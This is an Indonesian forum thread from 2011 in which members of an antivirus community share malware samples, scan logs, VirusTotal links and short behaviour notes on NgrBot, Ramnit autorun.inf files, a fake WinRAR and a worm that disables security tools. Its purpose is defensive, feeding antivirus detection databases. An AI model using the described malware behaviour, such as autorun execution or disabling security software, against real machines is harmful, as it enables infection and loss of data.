Ditulis oleh: MANGGOLO pada November 24, 2011, 09:43:58 PM
Dear ESSET team ^:)^ ^:)^

kok virus ini blm masuk database esset padahal ini virus tahun 2007/2008  ^-^

analisa virus total (http://www.virustotal.com/file-scan/report.html?id=a0a79877d032ae435620554d88b9f31ef5cae8f95d78857a9531558755088447-1322143853)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: payjho pada November 24, 2011, 09:47:26 PM
bukan virus deh itu gan, itu cma kyk applikasi buat penghapus file aja gitu :D


cmiiw
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada November 24, 2011, 10:15:56 PM
bukan virus deh itu gan, itu cma kyk applikasi buat penghapus file aja gitu :D


cmiiw
Yupss.. Saya juga berpikiran begitu..  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada November 25, 2011, 05:41:33 PM
Dear ESSET team ^:)^ ^:)^

kok virus ini blm masuk database esset padahal ini virus tahun 2007/2008  ^-^

analisa virus total (http://www.virustotal.com/file-scan/report.html?id=a0a79877d032ae435620554d88b9f31ef5cae8f95d78857a9531558755088447-1322143853)

Dear ESET User,

As we haven't found any unequivocally malicious functionality in this file(s), they will not be detected as malware.
However, this file(s) will be subjected to further analysis and our standpoint can be reconsidered.

Regards,
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 01, 2011, 07:18:15 AM
Terima kasih buat rekan-rekan smadav yang sudah menyempatkan waktu mengirimkan sampel virus disini berikut hasil scanning dari PCMAV Express for NgrBot update 22 Nov 2011. :)

Kode: [Pilih]
ATTENTION! For best result before starting the Scan & Clean process, please:
*) Close all GUI applications.
*) Disconnect LAN/Internet connection.

Scanning mutex...
Scanning registry...
Scanning all drives, please wait...
- Scanning C:\
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\bcd8f464.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\e621ca05.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\FACEBOOK-DSC000089764322881411114.jpg.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\fuckHDZSDP.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Jttetn.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Mstetq.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\newmoon17.exe -> NgrBot.R.drp.A
- Scanning D:\

System time: 01/12/2011 7:10:56
Scan finished: 0:1:49.788
File scanned: 27375
File detected: 7
File cured: 0
File removed: 7ATTENTION! For best result before starting the Scan & Clean process, please:
*) Close all GUI applications.
*) Disconnect LAN/Internet connection.

Scanning mutex...
Scanning registry...
Scanning all drives, please wait...
- Scanning C:\
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\bcd8f464.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\e621ca05.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\FACEBOOK-DSC000089764322881411114.jpg.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\fuckHDZSDP.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Jttetn.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Mstetq.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\newmoon17.exe -> NgrBot.R.drp.A
- Scanning D:\

System time: 01/12/2011 7:10:56
Scan finished: 0:1:49.788
File scanned: 27375
File detected: 7
File cured: 0
File removed: 7
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 01, 2011, 11:49:51 AM
Terima kasih buat rekan-rekan smadav yang sudah menyempatkan waktu mengirimkan sampel virus disini berikut hasil scanning dari PCMAV Express for NgrBot update 22 Nov 2011. :)

Kode: [Pilih]
ATTENTION! For best result before starting the Scan & Clean process, please:
*) Close all GUI applications.
*) Disconnect LAN/Internet connection.

Scanning mutex...
Scanning registry...
Scanning all drives, please wait...
- Scanning C:\
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\bcd8f464.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\e621ca05.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\FACEBOOK-DSC000089764322881411114.jpg.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\fuckHDZSDP.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Jttetn.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Mstetq.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\newmoon17.exe -> NgrBot.R.drp.A
- Scanning D:\

System time: 01/12/2011 7:10:56
Scan finished: 0:1:49.788
File scanned: 27375
File detected: 7
File cured: 0
File removed: 7ATTENTION! For best result before starting the Scan & Clean process, please:
*) Close all GUI applications.
*) Disconnect LAN/Internet connection.

Scanning mutex...
Scanning registry...
Scanning all drives, please wait...
- Scanning C:\
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\bcd8f464.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\e621ca05.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\FACEBOOK-DSC000089764322881411114.jpg.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\fuckHDZSDP.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Jttetn.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Mstetq.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\newmoon17.exe -> NgrBot.R.drp.A
- Scanning D:\

System time: 01/12/2011 7:10:56
Scan finished: 0:1:49.788
File scanned: 27375
File detected: 7
File cured: 0
File removed: 7
yoyoiiii gan sama-sama ya, sebagai calon mastah kalo gw nemu virus pasti gw uplod disini ya gan :-bd <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Asoy pada Desember 07, 2011, 06:23:49 PM
tolong dong kasi keterangan soal virus w32/slugin.a
dia kedetect avira version 12 saya, tapi smadav 8.7 diem aja

virus ini saya upload ke virus4.com
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MANGGOLO pada Desember 07, 2011, 06:28:04 PM
Terima kasih buat rekan-rekan smadav yang sudah menyempatkan waktu mengirimkan sampel virus disini berikut hasil scanning dari PCMAV Express for NgrBot update 22 Nov 2011. :)

Kode: [Pilih]
ATTENTION! For best result before starting the Scan & Clean process, please:
*) Close all GUI applications.
*) Disconnect LAN/Internet connection.

Scanning mutex...
Scanning registry...
Scanning all drives, please wait...
- Scanning C:\
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\bcd8f464.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\e621ca05.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\FACEBOOK-DSC000089764322881411114.jpg.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\fuckHDZSDP.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Jttetn.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Mstetq.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\newmoon17.exe -> NgrBot.R.drp.A
- Scanning D:\

System time: 01/12/2011 7:10:56
Scan finished: 0:1:49.788
File scanned: 27375
File detected: 7
File cured: 0
File removed: 7ATTENTION! For best result before starting the Scan & Clean process, please:
*) Close all GUI applications.
*) Disconnect LAN/Internet connection.

Scanning mutex...
Scanning registry...
Scanning all drives, please wait...
- Scanning C:\
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\bcd8f464.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\e621ca05.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\FACEBOOK-DSC000089764322881411114.jpg.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\fuckHDZSDP.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Jttetn.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Mstetq.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\newmoon17.exe -> NgrBot.R.drp.A
- Scanning D:\

System time: 01/12/2011 7:10:56
Scan finished: 0:1:49.788
File scanned: 27375
File detected: 7
File cured: 0
File removed: 7
kok malah hasil scaningnya pake PCMAV Express for NgrBot sih gan  :-\ :-\
hasil analisa dengan smadavnya di tunggu nih  ^:)^ ^:)^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 08, 2011, 10:42:12 AM
gan gw nemu virus nih : fake dll Microsoft  ^_^  <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 10, 2011, 05:58:35 PM
gan gw nemu virus nih : fake dll Microsoft  ^_^  <=)
Para mastah.. Ajarin donk cara menjalankan file dll secara terpisah melalui Run32dll.exe.  ^:)^
Biar bisa bermain2 dengan virus yang diupload gan ponco ini.. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 12, 2011, 11:01:34 AM
Terima kasih buat rekan-rekan smadav yang sudah menyempatkan waktu mengirimkan sampel virus disini berikut hasil scanning dari PCMAV Express for NgrBot update 22 Nov 2011. :)

Kode: [Pilih]
ATTENTION! For best result before starting the Scan & Clean process, please:
*) Close all GUI applications.
*) Disconnect LAN/Internet connection.

Scanning mutex...
Scanning registry...
Scanning all drives, please wait...
- Scanning C:\
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\bcd8f464.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\e621ca05.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\FACEBOOK-DSC000089764322881411114.jpg.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\fuckHDZSDP.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Jttetn.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Mstetq.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\newmoon17.exe -> NgrBot.R.drp.A
- Scanning D:\

System time: 01/12/2011 7:10:56
Scan finished: 0:1:49.788
File scanned: 27375
File detected: 7
File cured: 0
File removed: 7ATTENTION! For best result before starting the Scan & Clean process, please:
*) Close all GUI applications.
*) Disconnect LAN/Internet connection.

Scanning mutex...
Scanning registry...
Scanning all drives, please wait...
- Scanning C:\
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\bcd8f464.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\e621ca05.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\FACEBOOK-DSC000089764322881411114.jpg.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\fuckHDZSDP.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Jttetn.exe -> NgrBot.U
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\Mstetq.exe -> NgrBot.R
- File removed: C:\Documents and Settings\MiloMen\Desktop\virus\newmoon17.exe -> NgrBot.R.drp.A
- Scanning D:\

System time: 01/12/2011 7:10:56
Scan finished: 0:1:49.788
File scanned: 27375
File detected: 7
File cured: 0
File removed: 7
kok malah hasil scaningnya pake PCMAV Express for NgrBot sih gan  :-\ :-\
hasil analisa dengan smadavnya di tunggu nih  ^:)^ ^:)^
Tidak semua tipe virus bisa dibersihkan Smadav, Smadav saat ini masih belum mampu membersihkan tipe virus penginfeksi program atau tipe rootkit (misalnya : virus Ramnit, Sality, Alman, Virut, dll.) karena jenis virus ini sudah merusak sebagian besar file program Anda. Fokus kami saat ini adalah pembersihan tuntas untuk tipe virus selain dua tipe tersebut (misalnya : virus WormShortcut, Serviks, MSO, Brontok, dll.).

Sumber: KLIK DISINI GAN.... (http://smadaver.com/bug-kritik-saran/4-fungsi-utama-smadav/)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 14, 2011, 05:36:35 PM
virus microjoiner,,, iconnya seperti qvod setup. cekidot!
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 14, 2011, 05:39:44 PM
virus microjoiner,,, iconnya seperti qvod setup. cekidot!
Pertamax nyedot gan.. Percakapan selanjutnya sambung di chi-chat.. Trims sampelnya.. :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 14, 2011, 05:42:05 PM
ada lagi gan, gak tau ini sejenis atau variannya,,, cekidot lagi  <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Metamorphic pada Desember 14, 2011, 08:31:17 PM
@up, seep...  :-bd untuk database Brigade antivirus selanjutnya ;) \m/
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 14, 2011, 08:47:59 PM
@up, seep...  :-bd untuk database Brigade antivirus selanjutnya ;) \m/
ok2,,, ikutan upload dimari dong gan, gw tau ente kan dedengkotnya brigade AV pasti bnyak koleksi virus  <=) ikutan upload dimari ya gan
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: suryascience pada Desember 15, 2011, 10:24:56 AM
Virus yang aku upload ini belum terdeteksi sama SMADAV ver 8.8.4 . Kalau sama AVAST terdeteksi sebagai virus AUTORUN DE (WORM). Aku agak bingung juga nih autorun.inf ini buatan SMADAV atau Varian dari RAMNIT, sebab adanya di FLASHDISK, kalau aku lihat file SMADLOCK nya ada tapi AUTORUN.INF nya yang ini. :o .

Rekan-rekan analys tolong deh di cek yah..., (http://static.kaskus.us/images/smilies/toastcendol.gif)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 15, 2011, 10:36:12 AM
Virus yang aku upload ini belum terdeteksi sama SMADAV ver 8.8.4 . Kalau sama AVAST terdeteksi sebagai virus AUTORUN DE (WORM). Aku agak bingung juga nih autorun.inf ini buatan SMADAV atau Varian dari RAMNIT, sebab adanya di FLASHDISK, kalau aku lihat file SMADLOCK nya ada tapi AUTORUN.INF nya yang ini. :o .

Rekan-rekan analys tolong deh di cek yah..., (http://static.kaskus.us/images/smilies/toastcendol.gif)
Ini autorun dari virus gan.. Kalo autorun dari smadav itu tipenya folder, bukan setup information.

Di dalam autorun.inf ini ada tulisan:

Sorry but you are not allowed to view spoiler contents.

Yang mengubah icon flash disk dan menjalankan pMNMKiNI.exe yang ada di dalam folder RECYCLER\S-2-1-36-7847201537-3341363358-370624775-8253 ketika flashdisk di buka dengan cara klik ganda, dengan cara klik kanan open maupun explore ataupun memanfaatkan fitur autoplay yang belum dimatikan..  :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Manggolo pada Desember 15, 2011, 10:38:31 AM
Virus yang aku upload ini belum terdeteksi sama SMADAV ver 8.8.4 . Kalau sama AVAST terdeteksi sebagai virus AUTORUN DE (WORM). Aku agak bingung juga nih autorun.inf ini buatan SMADAV atau Varian dari RAMNIT, sebab adanya di FLASHDISK, kalau aku lihat file SMADLOCK nya ada tapi AUTORUN.INF nya yang ini. :o .

Rekan-rekan analys tolong deh di cek yah..., (http://static.kaskus.us/images/smilies/toastcendol.gif)
itu autorin.inf nya ramnit A gan.udah keditek kok gan oleh smadav.
kalau di flasdisk agan tidak terditek berarti file exsekusinya yang di recycler ( di flasdisk ) tidak ada,atau sama sekali tidak ada folder RECYCLER di flasdisk.
emang kalau file exsekusi dari autorun.inf nya tidak ada maka smadav menganggap autorun.inf nya tersebut bukan virus.
saran ; di lock lagi saja gan flasdisknya biar autorun.infnya tidak balik lagi.terkecuali agan memang senang bermain-main dengan ramnit  :D

@ Ki@mhu yang dimaksut icon=%WinDir%\system32\shell32.dll,4  itu adalah icon dari autorun.inf nya tersebut bukan merubah icon flasdisk.
kalau merubah icon flasdisk biasanya ada file desktop.ini CMIIW
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: suryascience pada Desember 15, 2011, 10:43:59 AM
Kutip
itu autorin.inf nya ramnit A gan.udah keditek kok gan oleh smadav.
kalau di flasdisk agan tidak terditek berarti file exsekusinya yang di recycler ( di flasdisk ) tidak ada,atau sama sekali tidak ada folder RECYCLER di flasdisk.
emang kalau file exsekusi dari autorun.inf nya tidak ada maka smadav menganggap autorun.inf nya tersebut bukan virus.
saran ; di lock lagi saja gan flasdisknya biar autorun.infnya tidak balik lagi.terkecuali agan memang senang bermain-main dengan ramnit  Cheesy

@ Ki@mhu yang dimaksut icon=%WinDir%\system32\shell32.dll,4  itu adalah icon dari autorun.inf nya tersebut bukan merubah icon flasdisk.
kalau merubah icon flasdisk biasanya ada file desktop.ini CMIIW

Wow.., (http://static.kaskus.us/images/smilies/jempol1.gif) Than's kek nya autorun nya RAMNIT yah  (http://static.kaskus.us/images/smilies/toastcendol.gif)
Di Kompi aku nggak bisa dibuka sebab udah di lock sama AVAST, mau di kompres pake winrar aku harus copy ke
chest nya AVAST dolo  (http://i1086.photobucket.com/albums/j460/achilsp/kiss.gif)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 15, 2011, 11:15:47 AM
Kutip
@ Ki@mhu yang dimaksut icon=%WinDir%\system32\shell32.dll,4  itu adalah icon dari autorun.inf nya tersebut bukan merubah icon flasdisk.
kalau merubah icon flasdisk biasanya ada file desktop.ini CMIIW

Bisa koq gann.. Autorun.inf juga bisa ubah icon. Sewaktu ane copy-pastekan autorun.inf tadi ke flashdisk, icon flashdisknya berubah menjadi map terbuka berwarna kuning:
Sorry but you are not allowed to view spoiler contents.
Icon %WinDir%\system32\shell32.dll,4 inilah yang bergambar map kuning terbuka tersebut.. :)

Setelah itu, ane ganti lagi menjadi %WinDir%\system32\shell32.dll,27 dan hasilnya seperti ini:
Sorry but you are not allowed to view spoiler contents.
Kalo icon dari autorun.inf kan seperti ini: (tanpa bisa diganti kecuali dari registry)
Sorry but you are not allowed to view spoiler contents.
CMIIW.. :)
(http://static.kaskus.us/customavatars/avatar2950903_4.gif)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 15, 2011, 03:52:59 PM
agan-agan tadi siang gw Nemu virus dari Facebook lagi,dapet dr lappy temen gw. cekidot gan  <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: r4n pada Desember 16, 2011, 06:39:50 PM
gan virus ekstesi .vbe yang ngopi file word bahaya ga ya?
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 16, 2011, 07:39:11 PM
gan virus ekstesi .vbe yang ngopi file word bahaya ga ya?
Bahaya bro.. Itu virus Alice.. Jika kompi agan sudah terlanjur terkena virus ini, cepetan full scan pake Smadav dan aktifkan Smad-lock.. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 16, 2011, 09:14:06 PM
agan-agan tadi siang gw Nemu virus dari Facebook lagi,dapet dr lappy temen gw. cekidot gan  <=)
Terima kasih atas sampelnya, virus anda sudah saya teruskan ke Zai untuk di analisa lebih lanjut. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: rashid pada Desember 18, 2011, 12:36:56 PM
kyy belum bisa didetek smadav nie virus
http://www.virustotal.com/file-scan/report.html?id=be10a82af1c44191110b675055a36678a81a71dc58c5e2d6fd1a708b395e180d-1324185714

password: 1234
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada Desember 19, 2011, 09:45:30 AM
kyy belum bisa didetek smadav nie virus
http://www.virustotal.com/file-scan/report.html?id=be10a82af1c44191110b675055a36678a81a71dc58c5e2d6fd1a708b395e180d-1324185714

password: 1234
dideteksi sebagai kryptik di eset
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 19, 2011, 11:26:13 AM
lagi ngenet ada notification suruh download file ini, ga tw nya winrar.exe. iseng coba cek di virustotal, kemungkinan malware. cekidot gan  <=)
Fake Winrar
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Rh354 pada Desember 19, 2011, 01:12:11 PM
lagi ngenet ada notification suruh download file ini, ga tw nya winrar.exe. iseng coba cek di virustotal, kemungkinan malware. cekidot gan  <=)
Fake Winrar
winrar3.2.exe known as probably a variant of Win32/TrojanDownloader.Obfuscated.BUJUXHL trojan in eset :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 19, 2011, 04:45:35 PM
lagi ngenet ada notification suruh download file ini, ga tw nya winrar.exe. iseng coba cek di virustotal, kemungkinan malware. cekidot gan  <=)
Fake Winrar
Ane sudah coba install di komp, gak ada keanehan apa2 gann.. ???
Gak ada perombakan registry yang mencurigakan..
Ni SS file2 hasil instalasi:
Sorry but you are not allowed to view spoiler contents.
Dan ini SS ketika winrar 3.2 beta ini dijalankan.. Semuanya normal gann.. Bisa nge-kompress dan bisa meng-ekstrak kembali.. Hanya saja, tulisannya penuh tanda tanya..
Sorry but you are not allowed to view spoiler contents.

Dan juga bisa diuninstall kembali dengan mudah.. Tapi mengapa hasil di virustotal.com, ada yang menganggapnya Malware yahh? Ato ada yang lupa ane tinjau? :-\
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: RoyAdi pada Desember 20, 2011, 05:57:48 AM
ni virus gak om???
thx ya om :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 20, 2011, 09:33:30 AM
@Roy Adi: Bukan gan.. Itu hanya untuk mengubah icon dari suatu folder.. :)
Perhatikan isi tulisan didalamnya, ada tulisan icon di sana..
Sorry but you are not allowed to view spoiler contents.
Jika ada tulisan yang lain, itu bisa dicurigai sebagai virus..

Ataupun filenya berupa dekstop.ini (virus), bukan desktop.ini (bukan virus) seperti pada virus serviks.. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 20, 2011, 02:51:53 PM
@ki@mhu: makanya itu gan,,,aneh ya gan  :D tapi tanda tanya itu apa ya gan ??? gw belon coba gan,ga sempet lagi sibuk belajara gan.
klo disubmit ke VT sih bnyak yg anggap itu malware
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Metamorphic pada Desember 20, 2011, 03:31:47 PM
halo...
mohon dibantu dong... sudah pake smadav 8.2 tidak bisa hilang...  ^:)^


Dicoba dengan smadav terbaru aja bro...atau dicoba juga brigade antivirus udh bs mendeteksi virus yg agan upload... dicoba dgn database hari ini ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 22, 2011, 03:25:30 PM
@Metamorphic: gimana sih gan,postingan 5 oktober 2010 masih di bales juga ckckckck  ;D ^_^ basi kali gan  ;D

@ALL:
btw,,, ada Fake AV nih gan! dapet dari warnet,icon nya mirip bgt kaya PandaCloud antivirus gan. cekidot aja langsung gan,di download ya gan  <=)

VT nya gan:
http://www.virustotal.com/file-scan/report.html?id=0cbe16c199808310cf91fc80aad84f723d282b2ac13ccdc0848612baf904d631-1324080052
Result:
28 /43 (65.1%)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: komogara pada Desember 22, 2011, 04:06:55 PM
Bro ponco udah kedetek ama trenmicro.but thx sharingnya  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 23, 2011, 02:05:55 PM
btw,,, sebentar lagi kan Taun Baru ya kan gan, gw punya koleksi virus gan,namanya NewYear gan. mudah-mudahan gak Repost ya gan  ,itung2 sharing aja gan <=) <=) hati-hati dengan virus ini ya gan  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ViperGM pada Desember 23, 2011, 02:23:28 PM
Wah ..
Si Ponco nih ..
Induk Virus keknya ..
bolak balik UPLOAD virus ^^

Keren bro^^
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: MiloMen™ pada Desember 23, 2011, 03:44:04 PM
btw,,, sebentar lagi kan Taun Baru ya kan gan, gw punya koleksi virus gan,namanya NewYear gan. mudah-mudahan gak Repost ya gan  ,itung2 sharing aja gan <=) <=) hati-hati dengan virus ini ya gan  :D
Ok terima kasih sampelnya sudah di terima dan akan di tambah ke database smadav versi selanjutnya. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 23, 2011, 03:58:03 PM
btw,,, sebentar lagi kan Taun Baru ya kan gan, gw punya koleksi virus gan,namanya NewYear gan. mudah-mudahan gak Repost ya gan  ,itung2 sharing aja gan <=) <=) hati-hati dengan virus ini ya gan  :D
Ok terima kasih sampelnya sudah di terima dan akan di tambah ke database smadav versi selanjutnya. :)
sama-sama ya gan  :-bd ini perwujudan gw mendukung smadav gan  <=)  <=)
oiya gan, klo bisa virusnya di analisa tuh gan,soalnya di tempat gw banyak yg kena virus itu gan,dikiranya game menjelang Taun baru gan  :D
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ryan BeKaBe pada Desember 23, 2011, 05:33:06 PM
btw,,, sebentar lagi kan Taun Baru ya kan gan, gw punya koleksi virus gan,namanya NewYear gan. mudah-mudahan gak Repost ya gan  ,itung2 sharing aja gan <=) <=) hati-hati dengan virus ini ya gan  :D
Ok terima kasih sampelnya sudah di terima dan akan di tambah ke database smadav versi selanjutnya. :)
sama-sama ya gan  :-bd ini perwujudan gw mendukung smadav gan  <=)  <=)
oiya gan, klo bisa virusnya di analisa tuh gan,soalnya di tempat gw banyak yg kena virus itu gan,dikiranya game menjelang Taun baru gan  :D
Hehe, dengan senang hati, akan kami coba review. Thq. ;)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 23, 2011, 07:07:31 PM
Gan,, <=) Virus New Year ini mendisable:

Task Manager
Regedit
Windows security
Macro security
Windws update
System restore
Microsoft Security Essentials (MSE)
"Run" command
Safe mode
Malware remover
Calculator
Media Player
Mozilla Firefox
Notepad
Wordpad
Yahoo Messeger
Windows installer (So you can not install any antivirus)
Security Center
Command Prompt
Windows firewall


Menyebar lewat:

Email
Kazza
Outlook
mIRC
Skype
MSN
Emule
ICQ
DLL (Dan Lain2)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 23, 2011, 08:05:10 PM
Gan,, <=) Virus New Year ini mendisable:

Task Manager
Regedit
Windows security
Macro security
Windws update
System restore
Microsoft Security Essentials (MSE)
"Run" command
Safe mode
Malware remover
Calculator
Media Player
Mozilla Firefox
Notepad
Wordpad
Yahoo Messeger
Windows installer (So you can not install any antivirus)
Security Center
Command Prompt
Windows firewall


Menyebar lewat:

Email
Kazza
Outlook
mIRC
Skype
MSN
Emule
ICQ
DLL (Dan Lain2)
Ijin sedot yahh.. Biar ane taruh di Blog.. :)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 24, 2011, 07:33:57 AM
Gan,, <=) Virus New Year ini mendisable:

Task Manager
Regedit
Windows security
Macro security
Windws update
System restore
Microsoft Security Essentials (MSE)
"Run" command
Safe mode
Malware remover
Calculator
Media Player
Mozilla Firefox
Notepad
Wordpad
Yahoo Messeger
Windows installer (So you can not install any antivirus)
Security Center
Command Prompt
Windows firewall


Menyebar lewat:

Email
Kazza
Outlook
mIRC
Skype
MSN
Emule
ICQ
DLL (Dan Lain2)
Ijin sedot yahh.. Biar ane taruh di Blog.. :)
oke gan silahkan ya gan  <=) jangan lupa ijo2nya gan  :D. gw ada beberapa sampel lagi gan, pokoknya virus terbaru deh,tp belom sepet gw upload dimari coz gw mao pergi keluar kota hari ini gan  <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: Ki@mhu pada Desember 24, 2011, 12:45:17 PM
@Ponco: Yup.. Ijo2nya uda datang.. Haha..
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: 3ndiixz pada Desember 24, 2011, 07:04:35 PM
Berbahaya tuh Virus
Masukin DB Smadav edisi taon baru juga broo  :-bd  :-bd
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: ponco wiibowo pada Desember 27, 2011, 11:59:23 AM
@ki@mhu: mantap gan thanks ya gan  <=)

@3ndiixz: ide bagus tuh gan  <=)

gan, ini ada FakeAV gan... dapet dari laptop temen gw gan. cekidot downlod ya gan  <=) <=)
Judul: Re: Re: Upload VIRUS ke Forum..
Ditulis oleh: suryascience pada Desember 27, 2011, 10:13:26 PM
Baru aja aku dapat nih Trojan yang di Block sama AVAST, terdeteksi sebagai Trojan VBS AGENT ( Ini yang ke 19 selama aku Browse dari tanggal 20 Desember 2011, Hati-hati menjelang tahun baru 2012 ini banyak TROJAN berkeliaran ). Sama SMADAV 8.8 nggak dianggap virus alias belum terdeteksi.

